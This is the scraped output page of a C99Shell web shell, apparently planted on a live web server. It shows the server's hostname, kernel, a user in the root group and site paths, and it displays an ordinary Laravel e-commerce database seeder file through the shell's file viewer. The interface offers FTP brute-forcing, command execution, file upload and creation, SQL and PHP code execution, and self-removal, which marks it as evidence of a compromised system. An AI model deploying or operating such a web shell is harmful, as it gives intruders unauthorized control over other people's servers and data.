!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html_ecom1/database/seeders/   drwxr-xr-x
Free 26.03 GB of 117.98 GB (22.06%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     DatabaseSeeder.php (3.34 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Database\Seeders;

use 
Illuminate\Database\Seeder;
use 
Database\Seeders\versions\v1_3_0\PreferencesTableSeeder as PreferencesV13TableSeeder;
use 
Database\Seeders\versions\v1_4_0\PreferencesTableSeeder as PreferencesV14TableSeeder;
use 
Database\Seeders\versions\v1_4_0\PermissionsTableSeeder as PermissionsV14TableSeeder;

class 
DatabaseSeeder extends Seeder
{
    
/**
     * Seed the application's database.
     *
     * @return void
     */
    
public function run()
    {
        
$this->call(CountriesTableSeeder::class);
        
$this->call(CurrenciesTableSeeder::class);
        
$this->call(EmailConfigurationsTableSeeder::class);
        
$this->call(LanguagesTableSeeder::class);
        
$this->call(EmailTemplatesTableSeeder::class);
        
$this->call(PermissionsTableSeeder::class);
        
$this->call(PreferencesTableSeeder::class);
        
$this->call(RolesTableSeeder::class);
        
$this->call(UsersTableSeeder::class);
        
$this->call(VendorsTableSeeder::class);
        
$this->call(RoleUsersTableSeeder::class);
        
$this->call(VendorUsersTableSeeder::class);
        
$this->call(CategoriesTableSeeder::class);
        
$this->call(BrandsTableSeeder::class);
        
$this->call(AttributeGroupsTableSeeder::class);
        
$this->call(AttributesTableSeeder::class);
        
$this->call(AttributeValuesTableSeeder::class);
        
$this->call(PermissionRolesTableSeeder::class);
        
$this->call(ProductsTableSeeder::class);
        
$this->call(ProductCategoriesTableSeeder::class);
        
$this->call(WishlistsTableSeeder::class);
        
$this->call(ReviewsTableSeeder::class);
        
$this->call(AddressesTableSeeder::class);
        
$this->call(FilesTableSeeder::class);
        
$this->call(ProductCrossSalesTableSeeder::class);
        
$this->call(ProductRelatesTableSeeder::class);
        
$this->call(TagsTableSeeder::class);
        
$this->call(ProductTagsTableSeeder::class);
        
$this->call(OrderStatusesTableSeeder::class);
        
$this->call(OrderStatusRolesTableSeeder::class);
        
$this->call(CategoryAttributesTableSeeder::class);
        
$this->call(WithdrawalMethodsTableSeeder::class);
        
$this->call(UserWithdrawalSettingsTableSeeder::class);
        
$this->call(ObjectFilesTableSeeder::class);
        
$this->call(ProductsMetaTableSeeder::class);
        
$this->call(ProductUpsalesTableSeeder::class);
        
$this->call(ProductCouponsTableSeeder::class);
        
$this->call(FlashSalesTableSeeder::class);
        
$this->call(UsersMetaTableSeeder::class);
        
$this->call(VendorsMetaTableSeeder::class);
        
$this->call(OrdersTableSeeder::class);
        
$this->call(OrderStatusHistoriesTableSeeder::class);
        
$this->call(OrdersMetaTableSeeder::class);
        
$this->call(OrderDetailsTableSeeder::class);
        
$this->call(OrderCommissionsTableSeeder::class);
        
$this->call(BrandStatsTableSeeder::class);
        
$this->call(CategoryStatsTableSeeder::class);
        
$this->call(PaymentLogsTableSeeder::class);
        
$this->call(ProductStatsTableSeeder::class);
        
$this->call(WalletsTableSeeder::class);
        
$this->call(TransactionsTableSeeder::class);
        
$this->call(PreferencesV13TableSeeder::class);
        
$this->call(PreferencesV14TableSeeder::class);
        
$this->call(PermissionsV14TableSeeder::class);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0051 ]--